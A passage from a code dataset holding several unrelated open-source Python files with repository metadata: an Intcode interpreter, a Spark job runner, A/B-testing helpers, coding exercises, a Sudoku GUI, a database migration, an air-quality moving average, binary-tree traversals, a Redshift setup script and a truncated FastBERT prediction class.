fn == '02':\n opcode_2(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif fn == '03':\n input_val = self.read_input()\n opcode_3(self.memory, self.index, input_val)\n count = 2\n elif fn == '04':\n self.output = opcode_4(self.memory, self.index)\n # print('Output: ',self.output)\n self.index += 2\n break\n elif fn == '05':\n self.index = opcode_5(self.memory, opcode[-4:-2], self.index)\n count = 3\n elif fn == '06':\n self.index = opcode_6(self.memory, opcode[-4:-2], self.index)\n count = 3\n elif fn == '07':\n opcode_7(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif fn == '08':\n opcode_8(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif fn == '99':\n opcode_99()\n self.finished = True\n break\n else:\n print('Error')\n break\n\n # increment in case where instruction pointer has not changed\n if did_change(self.memory, self.index, opcode):\n continue\n else:\n self.index += count\n continue\n return 'Error'\n","repo_name":"E-Aho/AdventOfCode2019","sub_path":"07/Methods.py","file_name":"Methods.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34886155485","text":"import json\nimport logging\nimport logging.config as log_conf\nimport os\nimport subprocess\nimport sys\n\nimport argparse\nimport textwrap\n\nimport setup_property\n\n\nclass RunnerError(Exception):\n def __init__(self, value):\n self._value = value\n\n def __str__(self):\n return repr(self._value)\n\n\ndef main(arguments):\n spark_submit = \"{0}/bin/spark-submit\".format(arguments.spark_path)\n monanas_path = os.environ.get('MONANAS_HOME', \"\")\n kafka_jar = None\n\n try:\n for filename in os.listdir(\"{0}/external/kafka-assembly/target\".\n format(arguments.spark_path)):\n if filename.startswith(\"spark-streaming-kafka-assembly\") and\\\n not any(s in filename for s in [\"source\", \"test\"]):\n kafka_jar = filename\n break\n\n if not kafka_jar:\n raise OSError(\"Spark's external library required does not exist.\")\n except OSError as e:\n raise RunnerError(e.__str__())\n\n spark_kafka_jar = \"{0}/external/kafka-assembly/target/{1}\".\\\n format(arguments.spark_path, kafka_jar)\n command = [\n spark_submit, \"--master\", \"local[2]\",\n \"--jars\", spark_kafka_jar, monanas_path 
+ \"/monasca_analytics/monanas.py\",\n arguments.config, arguments.log_config\n ]\n\n if arguments.sources is not None:\n command += arguments.sources\n\n try:\n logger.info(\"Executing `{}`...\".format(\" \".join(command)))\n subprocess.Popen(command).communicate()\n except OSError as e:\n raise RunnerError(e.__str__())\n\n\ndef setup_logging(filename):\n \"\"\"Setup logging based on a json string.\"\"\"\n with open(filename, \"rt\") as f:\n config = json.load(f)\n\n log_conf.dictConfig(config)\n\ndef setup_parser():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=textwrap.dedent(__doc__.strip()),\n add_help=False)\n\n parser.add_argument('-c', '--config',\n help='Config file.', required=True)\n # \"-d\" currently unused\n parser.add_argument('-d', '--debug',\n help='Show debug messages.', action='store_true')\n parser.add_argument('-h', '--help',\n help='Show this screen.', action='help')\n parser.add_argument('-l', '--log_config',\n help='Log config file\\'s path.', required=True)\n parser.add_argument('-p', '--spark_path',\n help='Spark\\'s path.', required=True)\n parser.add_argument('-s', '--sources',\n help='A list of data sources.', nargs='*')\n parser.add_argument('-v', '--version',\n help='Show version.', action='version',\n version=setup_property.VERSION)\n\n return parser\n\nif __name__ == \"__main__\":\n arguments = setup_parser().parse_args()\n\n try:\n setup_logging(arguments.log_config)\n except IOError:\n raise RunnerError(\"File not found: {0}.\".\n format(arguments.log_config))\n except ValueError:\n raise RunnerError(\"{0} is not a valid logging config file.\".\n format(arguments.log_config))\n\n logger = logging.getLogger(__name__)\n\n try:\n main(arguments)\n except KeyboardInterrupt:\n logger.info(\"Monanas run script stopped.\")\n except RunnerError as e:\n logger.error(e.__str__())\n except Exception as e:\n logger.error(\"Unexpected error: {0}. 
{1}.\".\n format(sys.exc_info()[0], e))\n","repo_name":"daisuke-fujita/monsaca-analytics_20190912","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7146913051","text":"import numpy as np\nimport pandas as pd\nfrom scipy.stats import beta, norm\nimport matplotlib.pyplot as plt\n\n\ndef update_beta_prior(trials: int, success: int, alpha0: float, beta0: float) -> tuple[float, float]:\n \"\"\"\n Updates the prior beta distribution parameters, alpha and beta, based on the number of trials and successes.\n\n Args:\n trials (int): The number of trials.\n success (int): The number of successes.\n alpha0 (float): The prior alpha parameter.\n beta0 (float): The prior beta parameter.\n\n Returns:\n A tuple containing the updated alpha and beta parameters, alpha1 and beta1 respectively.\n \"\"\"\n alpha1 = alpha0 + success\n beta1 = beta0 + trials - success\n return alpha1, beta1\n\n\ndef dbeta_B_minus_A(alpha_a: float, beta_a: float, alpha_b: float, beta_b: float) -> norm:\n \"\"\"\n Calculates the difference between two beta distributions, B and A, and returns a normal distribution.\n\n Args:\n alpha_a (float): The alpha parameter of distribution A.\n beta_a (float): The beta parameter of distribution A.\n alpha_b (float): The alpha parameter of distribution B.\n beta_b (float): The beta parameter of distribution B.\n\n Returns:\n A normal distribution representing the difference between distributions B and A.\n \"\"\"\n beta_mean_a = beta.mean(alpha_a, beta_a)\n beta_mean_b = beta.mean(alpha_b, beta_b)\n beta_var_a = beta.var(alpha_a, beta_a)\n beta_var_b = beta.var(alpha_b, beta_b)\n\n dbeta = norm(loc=beta_mean_b - beta_mean_a,\n scale=np.sqrt(beta_var_a + beta_var_b))\n return dbeta\n\n\ndef explain_prob_B_higher(df: pd.DataFrame, i: int) -> None:\n \"\"\"\n Plots the probability density function of the difference between two beta distributions and prints a summary of the\n results for a specific index in a pandas DataFrame.\n\n Args:\n df (pd.DataFrame): A pandas DataFrame containing the beta distribution parameters, p-values, and probability of\n B being higher for each variant.\n i (int): The index of the variant to summarize and plot.\n\n Returns:\n None. 
The function only produces a plot and prints a summary.\n \"\"\"\n mu = df['dbeta'][i].mean()\n sigma = df['dbeta'][i].std()\n\n x_axis = np.linspace(mu - 3 * sigma, mu + 3 * sigma, 100)\n y_axis = df['dbeta'][i].pdf(x_axis)\n\n plt.title(df['metric'][i])\n plt.xlabel('p_B - p_A')\n plt.ylabel('Probability density')\n plt.plot(x_axis, y_axis, color='blue')\n plt.fill_between(x_axis, y_axis, color='blue', alpha=.1)\n plt.axvline(x=0, color='red', linestyle='--')\n plt.show()\n\n p_A = df['p_A'][i]\n p_B = df['p_B'][i]\n Dpp = (p_B - p_A) * 100\n prob_B_higher = df['prob_B_higher'][i]\n\n print('Variant A performed p_A = ' + '{:.2%}'.format(p_A)\n + ' while p_B = ' + '{:.2%}'.format(p_B) + '.')\n if df['p_B'][i] > df['p_A'][i]:\n print('p_B is +' + '{:.2}'.format(Dpp) + 'pp higher than p_A.')\n print('You can be ' + '{:.0%}'.format(prob_B_higher)\n + ' confident that this is a result of the changes you made and not a result of random chance.')\n elif df['p_B'][i] < df['p_A'][i]:\n print('p_B is -' + '{:.2}'.format(-Dpp) + 'pp lower than p_A.')\n print('You can be ' + '{:.0%}'.format(1 - prob_B_higher)\n + ' confident that this is a result of the changes you made and not a result of random chance.')\n else:\n print('There is no statistical difference between variants A and B.')\n","repo_name":"slmf1995/ab_testing","sub_path":"bb_helpers.py","file_name":"bb_helpers.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5818115115","text":"if __name__ == '__main__':\n\n records = []\n\n for _ in range(int(input())):\n name = input()\n score = float(input())\n records.append([name, score])\n\n second_highest_points = sorted(set(points for _,points in records))[1]\n\n for failure in sorted([name for name, points in records if points == second_highest_points]):\n print(failure)\n ","repo_name":"PhilippKorth/hackerrank_solutions","sub_path":"basic_data_types/nested_lists.py","file_name":"nested_lists.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70078322247","text":"import logging\nfrom enum import StrEnum\nfrom tkinter import Button, LabelFrame, Tk\n\nfrom sudoku.view import SudokuBoard\n\nlogger = logging.getLogger(__name__)\n\n\nclass Actions(StrEnum):\n NEW_GAME = \"New Game\"\n SOLVE = \"Solve\"\n HINT = \"Hint\"\n\n\nclass SudokuApp(Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Sudoku\")\n\n logger.info(\"Creating Frames\")\n\n self.board = SudokuBoard()\n self.actions = LabelFrame(text=\"Actions\")\n\n # Creating Actions Buttons\n self.buttons = []\n for i, action in enumerate(Actions):\n self.buttons.append(\n Button(\n self.actions,\n text=action,\n padx=10,\n pady=5,\n command=lambda x=action: self.button_action(x),\n )\n )\n self.buttons[i].grid(row=1, column=i, padx=38, pady=10)\n\n self.actions.grid(row=1, column=1, padx=50, pady=10)\n\n # Generate Board and GUI\n self.board.generate()\n\n def button_action(self, action: Actions):\n if action == Actions.NEW_GAME:\n self.board.generate(None, 17)\n\n elif action == Actions.SOLVE:\n self.board.solve()\n\n elif action == Actions.HINT:\n self.board.hint()\n\n else:\n pass\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=\"INFO\")\n\n app = SudokuApp()\n 
app.mainloop()\n","repo_name":"JohN100x1/Commit-Sudoku","sub_path":"src/sudoku/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16897143730","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n from calculator_1 import add, sub, mul, div\n import sys\n\n args = sys.argv\n if len(args) != 4:\n print(\"Usage: ./100-my_calculator.py \")\n exit(1)\n if args[2] not in \"+-*/\":\n print(\"Unknown operator. Available operators: +, -, * and /\")\n exit(1)\n\n a = int(args[1])\n b = int(args[3])\n op = args[2]\n if op == \"+\":\n res = add(a, b)\n elif op == \"-\":\n res = sub(a, b)\n elif op == \"/\":\n res = div(a, b)\n else:\n res = mul(a, b)\n\n print(\"{} {} {} = {}\".format(a, op, b, res))\n","repo_name":"Nzioki-G/alx-higher_level_programming","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31284178239","text":"from random import randint\n\"\"\"1. Crie um algoritmo que defina um vetor de elementos inteiros de tamanho 7, insira\nvalores aleatórios neste vetor e calcule a soma dos elementos que ocupam as posições\npares do vetor seguida pelo valor da soma dos elementos que ocupam as suas posições\nímpares. Imprima o resultado no console.\nEx.: [2,0,1,5,9,7,6]\nResposta: 18-12\"\"\"\n\nVetor = []\n\nPar = 0\nImpar = 0\nfor i in range(0, 7):\n Random = randint(1, 100)\n while Random in Vetor:\n Random = randint(1, 100)\n if Random not in Vetor:\n break\n Vetor.append(Random)\n if Vetor.index(Vetor[i]) % 2 == 0:\n Par += Vetor[i]\n else:\n Impar += Vetor[i]\n\nprint(\"Vetor:\", Vetor)\nprint(\"Par:\", Par)\nprint(\"Impar:\", Impar)\n","repo_name":"RodneyAssis/Estudos-Python","sub_path":"Python/Unit - Programação/3º Periodo/Laboratorio de analise de algoritmo/Aula 1/Revisão 1.py","file_name":"Revisão 1.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36269409886","text":"\"\"\"empty message\n\nRevision ID: 6dc3f2e63558\nRevises: 8ebeb4c2e02f\nCreate Date: 2020-02-03 19:44:19.149282\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6dc3f2e63558\"\ndown_revision = \"8ebeb4c2e02f\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n conn = op.get_bind()\n # Remove meaningless permissions - a permission not granted to any user is not useful.\n conn.execute(\"DELETE FROM permissions WHERE granted_to_user is NULL\")\n op.alter_column(\n \"permissions\", \"granted_to_user\", existing_type=sa.INTEGER(), nullable=False\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column(\n \"permissions\", \"granted_to_user\", existing_type=sa.INTEGER(), nullable=True\n )\n # ### end Alembic commands ###\n","repo_name":"CIMAC-CIDC/cidc-api-gae","sub_path":"migrations/versions/6dc3f2e63558_.py","file_name":"6dc3f2e63558_.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"41069887043","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\n\n\npd.set_option(\"display.max_columns\", 30)\n\n# read data to dataframe\ndf = pd.read_excel('pyly_2.xlsx', sheet_name='Worksheet')\n\n# add columns - hour, day of the week, month\ndf['Godzina'] = df['Czas mierzenia'].apply(lambda x: int(datetime.datetime.strptime(x, '%m/%d/%Y %H:%M').time().hour))\ndf['Dzień tygodnia'] = df['Czas mierzenia'].apply(lambda x: int(datetime.datetime.strptime(x, '%m/%d/%Y %H:%M').date().weekday()))\ndf['Miesiąc'] = df['Czas mierzenia'].apply(lambda x: int(datetime.datetime.strptime(x, '%m/%d/%Y %H:%M').date().month))\ndf['Czas mierzenia'] = df['Czas mierzenia'].apply(lambda x: datetime.datetime.strptime(x, '%m/%d/%Y %H:%M'))\n\n# prediction time offset\ngodziny_prognozy = 12\n\n\n# creating prediction column\ndf['PM10_P'] = df['PM10'].shift(periods=-godziny_prognozy)\ndf = df.dropna(subset=['PM10_P'])\n\n\n# identify feature columns and target\nX = df[['PM1', 'PM25', 'PM10', 'Temperatura', 'Ciśnienie', 'Prędkość wiatru', 'Wind bearing', 'Godzina', 'Dzień tygodnia', 'Miesiąc']]\ny = df['PM10_P']\n\nX = X.iloc[3:]\nX = X.reset_index(drop=True)\ny = y[3:]\n\n\n\n\n\n#Średnia Krocząca\n\ndef movingavg(values, window):\n weights = np.repeat(1.0,window)/window\n smas = np.convolve(values,weights,'valid')\n return smas\n\n\nsk = y\nkrok = 72\n\npor_sk = y[krok-1:]\n\npred_sk = movingavg(sk,krok)\n\nmse = sum(abs(pred_sk - por_sk))/len(por_sk)\n\nprint(mse)\n\nczas_x =df['Czas mierzenia'][krok-1+3:]\n\n\n\n\nplt.figure(figsize=(10, 10))\nplt.plot(czas_x[-100:].values,por_sk[-100:], label = 'real')\nplt.plot(czas_x[-100:].values,pred_sk[-100:], label = 'pred')\nplt.xticks(rotation = 40)\nplt.legend()\nplt.show()\n\n\n","repo_name":"infoshareacademy/jdsz2-rundoom","sub_path":"projekt_ml/Rafał/pm_10_r.py","file_name":"pm_10_r.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31510891437","text":"from __init__ import *\n\nimport sys\nimport subprocess\nimport numpy as np\nfrom fractions import Fraction\n\nsys.path.insert(0, ROOT)\n\nfrom compiler import *\nfrom constructs import *\n\ndef nlmeans(pipe_data):\n\t# Params\n\tR = Parameter(Int, \"R\") # image rows\n\tC = Parameter(Int, \"C\") # image cols\n\tpatch_size = Parameter(Int, \"patch_size\")\n\tsearch_area = Parameter(Int, \"search_area\")\n\n\tsigma = 0.12\n\n\tpipe_data['R'] = R\n\tpipe_data['C'] = C\n\n\t# Vars\n\tx = Variable(Int, \"x\")\n\ty = Variable(Int, \"y\")\n\tz = Variable(Int, \"z\")\n\tc = Variable(Int, \"c\")\n\n\t# Input Image\n\timg = Image(Float, \"img\", [3, R, C])\n\n\t# clamped image - boundary conditions: repeat edge\n\trows = Interval(Int, 0, R-1)\n\tcols = Interval(Int, 0, C-1)\n\tcolours = Interval(Int, 0, 3)\n\ts_dom_x = Interval(Int, -search_area/2, search_area + 1)\n\ts_dom_y = Interval(Int, -search_area/2, search_area + 1)\n\n\t#clamped = Function(([c, x, y],[colours, 
rows, cols]), Float, \"clamped\")\n\t#xminR = Min(x, R-1)\n\t#xclamp = Max(xminR, 0)\n\t#yminC = Min(y, C-1)\n\t#yclamp = Max(0, yminC)\n\t#clamped.defn = [ img(c,) ]\n\t#clamped = img(c, xclamp, yclamp)\n\n\tdef clamped(k, i, j):\n\t\txminR = Min(i, R-1)\n\t\txclamp = Max(xminR, 0)\n\t\tyminC = Min(j, C-1)\n\t\tyclamp = Max(yminC, 0)\n\t\treturn img(k, xclamp, yclamp)\n\n\tinv_sigma_sq = -1.0/(sigma*sigma*patch_size*patch_size)\n\n\t# Halide: Define the difference Images (Func dc)\n\tdx = Variable(Int, \"dx\")\n\tdy = Variable(Int, \"dy\")\n\t\n\t## Body case\n\t#case_dc = Condition(x, \">=\", 1) & \\\n\t\t\t#Condition(x + dx, \">=\", 1) & \\\n\t\t\t#Condition(x, \"<=\", R) & \\\n\t\t\t#Condition(x + dx, \"<=\", R) & \\\n\t\t\t#Condition(y, \">=\", 1) & \\\n\t\t\t#Condition(y+dy, \">=\", 1) & \\\n\t\t\t#Condition(y, \"<=\", C) & \\\n\t\t\t#Condition(y+dy, \"<=\", C)\n\n\tdc = Function(([c, x, y, dx, dy], [colours, rows, cols, s_dom_x, s_dom_y]), Float, \"dc\")\n\tdc.defn = [ Powf((clamped(c,x,y) - clamped(c,x+dx,y+dy)),2) ]\n\n\t# Halide: Sum across colour channels (Func d)\n#\tchannels = Interval(Int, 0, 3)\n#\tchannels_red = Reduction(([c, x, y, dx, dy], [colours, rows, cols, s_dom_x, s_dom_y]), \\\n#\t\t\t([c], [channels]), \\\n#\t\t\tFloat, \\\n#\t\t\t\"channels\")\n#\td_sum = Reduce(channels_red(c, x, y, dx, dy), \\\n#\t\t\tdc(c, x, y, dx, dy), \\\n#\t\t\tOp.Sum)\n\t#d = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), Float, \"d\")\n\t#d.defn = [ d_sum ]\n\t#d = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \n\t\t#\t([c], [colours]), \n\td = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \n\t\t\t([x, y, dx, dy, c], [rows, cols, s_dom_x, s_dom_y, colours]), \n\t\t\tFloat, \n\t\t\t\"d\")\n\td.defn = [ Reduce(d(x, y, dx, dy), dc(c, x, y, dx, dy), Op.Sum) ]\n\td.default = float(0)\n\n\t# Halide: Find the patch differences by blurring the difference image\n\t# Function blur_d\n\tpatch_var = Variable(Int, \"patch_var\")\n\tpatch_interval = Interval(Int, -patch_size/2, patch_size + 1)\n\ty_patch_int = Interval(Int, patch_size/2, C - patch_size - 2)\n\tx_patch_int = Interval(Int, patch_size/2, R - patch_size - 2)\n\tblur_d_y = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \\\n\t\t\t([x, y, dx, dy, patch_var], [rows, y_patch_int, s_dom_x, s_dom_y, patch_interval]), \\\n\t\t\tFloat, \\\n\t\t\t\"blur_d_y\")\n\tblur_d_y.defn = [ Reduce(blur_d_y(x, y, dx, dy), \\\n\t\t\td(x, y + patch_var, dx, dy), \\\n\t\t\tOp.Sum) ]\n\tblur_d_y.default = float(0)\n\t#blur_d_y = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), Float, \"blur_d_y\")\n\t#blur_d_y.defn = [ blur_d_y_sum ]\n\n\t#blur_d_sum = Reduce(patch_dom(x, y, dx, dy), \\\n\t\t\t#\t\tblur_d_y(x + patch_var, y, dx, dy), \\\n\t\t\t#Op.Sum)\n\t#blur_d = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]) , Float, \"blur_d\")\n\t#blur_d.defn = [ blur_d_sum ]\n\tblur_d = Reduction(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \\\n\t\t\t([x, y, dx, dy, patch_var], [x_patch_int, cols, s_dom_x, s_dom_y, patch_interval]), \\\n\t\t\tFloat, \\\n\t\t\t\"blur_d\")\n\tblur_d.defn = [ Reduce(blur_d(x, y, dx, dy), \\\n\t\t\tblur_d_y(x+ patch_var, y, dx, dy), \\\n\t\t\tOp.Sum) ]\n\tblur_d.default = float(0)\n\n\t# Halide: Compute the weights from the patch differences.\n\tw = Function(([x, y, dx, dy], [rows, cols, s_dom_x, s_dom_y]), \\\n\t\t\tFloat, \\\n\t\t\t\"w\")\n\tw.defn = [ Exp(blur_d(x, y, dx, dy) * inv_sigma_sq) ]\n\t#w.defn = Cast(Float, blur_d(x, y, dx, dy) * inv_sigma_sq)\n\n\t# 
Halide: Add an alpha channel. Func clamped_with_alpha\n\t#cond_alpha = Condition(x, \">=\", 1) & Condition(x, \"<=\", R) & \\\n\t\t\t#\t\tCondition(y, \">=\", 1) & Condition(y, \"<=\", C) & \\\n\t\t\t#Condition(c, \">=\", 0) & Condition(c, \"<=\", 2)\n\t#ca = Variable(Int, \"ca\")\n\tcond_alpha = Condition(c, \">=\", 0) & Condition(c, \"<=\", 2)\n\n\tclamped_with_alpha = Function(([c, x, y], [colours, rows, cols]), \\\n\t\t\tFloat, \\\n\t\t\t\"clamped_with_alpha\")\n\tclamped_with_alpha.defn = [Select(cond_alpha, clamped(c, x, y), 1.0)]\n\n\t# Halide: Define a reduction domain for the search area.\n\tx_search_int = Interval(Int, search_area/2, R - search_area -2)\n\ty_search_int = Interval(Int, search_area/2, C - search_area -2)\n\tnon_local_means_sum = Reduction(([c, x, y], [colours, rows,cols]), \\\n\t\t\t([c, x, y, dx, dy], [colours, x_search_int, y_search_int, s_dom_x, s_dom_y]), \\\n\t\t\tFloat,\n\t\t\t\"non_local_means_sum\")\n\t# Halide: Compute the sum of the pixels in the search area.\n\t# Func non_local_means_sum\n\tnon_local_means_sum.defn = [ Reduce(non_local_means_sum(c, x, y), \\\n\t\t\tw(x, y, dx, dy) * clamped_with_alpha(c, x + dx, y + dy), \\\n\t\t\tOp.Sum) ]\n\tnon_local_means_sum.default = float(0)\n\t#non_local_means_sum = Function(([c, x, y], [colours, rows, cols]), Float, \"non_local_means_sum\")\n\t#non_local_means_sum.defn = [ s_dom_red ]\n\n\t# Final function: non_local_means\n\tc_int = Interval(Int, 0, 2)\n\tnlm_sum = non_local_means_sum(c, x, y) / non_local_means_sum(3, x, y)\n\t#condf = Condition(nlm_sum, \">=\", 0.0) & Condition(nlm_sum, \"<=\", 1.0)\n\tnon_local_means = Function(([c, x, y], [c_int, rows, cols]), Float, \"non_local_means\")\n\t#non_local_means.defn = [ Select(condf, nlm_sum, 0.0) ]\n\tnlm_min = Min(nlm_sum, 1.0)\n\tnlm_clamp = Max(nlm_min, 0.0)\n\tnon_local_means.defn = [ nlm_clamp ]\n\n\treturn non_local_means\n\n","repo_name":"bollu/polymage","sub_path":"sandbox/apps/python/img_proc/non_local_means/polymage_nlmeans.py","file_name":"polymage_nlmeans.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"12285838037","text":"import csv\nimport math\n\n\ndef sign(n: int) -> int:\n \"\"\"And the sign said \"Long-haired freaky people need not apply\".\"\"\"\n if n > 0:\n return 1\n elif n < 0:\n return -1\n else:\n return 0\n\n\ndef move_head(cur_pos: tuple, dir: str, dis: int) -> tuple:\n \"What is love? Baby don't hurt me, don't hurt me, no more.\"\n x, y = cur_pos\n if dir == \"U\":\n y += dis\n if dir == \"D\":\n y -= dis\n if dir == \"R\":\n x += dis\n if dir == \"L\":\n x -= dis\n return (x, y)\n\n\ndef move_tail(cur_pos: tuple, head_pos: tuple) -> tuple:\n \"\"\"I like to move it, move it. You like to... MOVE IT.\"\"\"\n dis = math.dist(head_pos, cur_pos)\n if dis < 2:\n return cur_pos\n else:\n pos_dif = tuple([x[0] - x[1] for x in zip(head_pos, cur_pos)])\n dif_x = 1 * sign(pos_dif[0])\n dif_y = 1 * sign(pos_dif[1])\n new_pos = tuple([sum(x) for x in zip(cur_pos, (dif_x, dif_y))])\n return new_pos\n\n\ndef book_keeper(records: dict, new_pos: tuple) -> dict:\n \"\"\"The silence is golden. To books I am beholden. 
I know I'm bad, cuz of the knowledge that I'm holdin!\"\"\"\n if new_pos in records:\n records[new_pos] += 1\n else:\n records[new_pos] = 0\n return records\n\n\nif __name__ == \"__main__\":\n head_pos = (0, 0)\n # tail_pos = (0,0)\n head_visits = {(0, 0): 1}\n # tail_visits = {(0,0): 1}\n other_pos = [(0, 0) for _ in range(9)]\n other_visits = [{(0, 0): 1} for _ in range(9)]\n\n with open(\"input.csv\", \"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n for i in range(int(row[1])):\n head_pos = move_head(head_pos, row[0], 1)\n head_visits = book_keeper(head_visits, head_pos)\n # tail_pos = move_tail(tail_pos, head_pos)\n # tail_visits = book_keeper(tail_visits, tail_pos)\n for i in range(9):\n relative_head = head_pos if i == 0 else other_pos[i - 1]\n other_pos[i] = move_tail(other_pos[i], relative_head)\n other_visits[i] = book_keeper(other_visits[i], other_pos[i])\n\n # part 1\n # print(len(tail_visits))\n print(len(other_visits[0]))\n\n # part 2\n print(len(other_visits[8]))\n","repo_name":"Chippers255/aoc_2022","sub_path":"day_9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41802949893","text":"# -*- coding:utf-8 -*-\nclass Node(object):\n \"\"\"节点\"\"\"\n def __init__(self,item):\n self.elem = item\n self.lchild = None\n self.rchild = None\n\n\nclass Tree(object):\n \"\"\"二叉树\"\"\"\n def __init__(self):\n self.root = None\n\n def add(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n return\n queue = [self.root] # 第一次时:queue = [None]\n while queue:#此时第一次会进入while循环,因为是对列表判断是否为空,而不是元素是不是None 即In [2]: bool([None])为True\n cur_node = queue.pop(0)\n if cur_node.lchild is None:\n cur_node.lchild = node\n return\n else:\n queue.append(cur_node.lchild)\n if cur_node.rchild is None:\n cur_node.rchild = node\n return\n else:\n queue.append(cur_node.rchild)\n\n def breadth_travel(self):\n \"\"\"广度遍历(层次遍历)\"\"\"\n if self.root is None:\n return\n queue = [self.root]\n while queue:\n cur_node = queue.pop(0)\n print(cur_node.elem, end=\" \")#end = \" \"代表不换行\n if cur_node.lchild is not None:\n queue.append(cur_node.lchild)\n if cur_node.rchild is not None:\n queue.append(cur_node.rchild)\n\n def preorder(self, node): #node代表根节点\n \"\"\"递归实现先序遍历\"\"\"\n if node is None: #等同于 if node == None\n return\n print(node.elem, end=\" \")\n self.preorder(node.lchild)\n self.preorder(node.rchild)\n\n def inorder(self, node):\n \"\"\"递归实现中序遍历\"\"\"\n if node is None: #代表递归的终结\n return\n self.inorder(node.lchild)\n print(node.elem, end=\" \")\n self.inorder(node.rchild)\n\n def postorder(self, node):\n \"\"\"递归实现后序遍历\"\"\"\n if node is None:\n return\n self.postorder(node.lchild)\n self.postorder(node.rchild)\n print(node.elem, end=\" \")\n\n\nif __name__ == \"__main__\":\n tree = Tree()\n tree.add(0)\n tree.add(1)\n tree.add(2)\n tree.add(3)\n tree.add(4)\n tree.add(5)\n tree.add(6)\n tree.add(7)\n tree.add(8)\n tree.add(9)\n print(\"广度遍历:\", end=\"\")\n tree.breadth_travel()\n print(\" \")\n print(\"先序遍历:\", end=\"\")\n tree.preorder(tree.root)\n print(\" \")\n print(\"中序遍历:\", end=\"\")\n tree.inorder(tree.root)\n print(\" \")\n print(\"后序遍历:\", end=\"\")\n tree.postorder(tree.root)","repo_name":"taogangshow/python_Code","sub_path":"第3章 
数据结构与算法/数据库结构与算法/16_binary_tree.py","file_name":"16_binary_tree.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17193549448","text":"import configparser\nimport psycopg2\nfrom sql_queries import create_table_queries, drop_table_queries\n\n\ndef drop_tables(cur, conn):\n ''' Drops tables based on sql_queries.py.'''\n for query in drop_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef create_tables(cur, conn):\n '''\n Create tables based on sql_queries.py. sql_queries.py defines 5 tables and \n specifies all columns for each of these with the right data types and conditions.\n '''\n for query in create_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n drop_tables(cur, conn)\n create_tables(cur, conn)\n \n conn.close()\n\nif __name__ == \"__main__\": main()","repo_name":"mekarim/redshift_datawarehouse_udacity_tutorial","sub_path":"create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24229136852","text":"# -*- coding: utf-8 -*\nfrom flyai.framework import FlyAI\n\nimport os, sys\nfastbert_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../../\"))\nsys.path.append(fastbert_dir)\nimport torch\nfrom fastbert import FastBERT\nfrom getDataSet import editDFLine, getModelData\n\nmodel_saving_path = \"./data/output/model/best.bin\"\n\nclass Prediction(FlyAI):\n def load_model(self):\n '''\n 模型初始化,必须在此方法中加载模型\n '''\n\n self.dfTrainLabelList, self.dfTrainSList, self.dfVaLabelList, self.dfVaSList, self.labels, self.Label2Char= getModelData(EXMode=1)\n\n self.model = FastBERT(\n 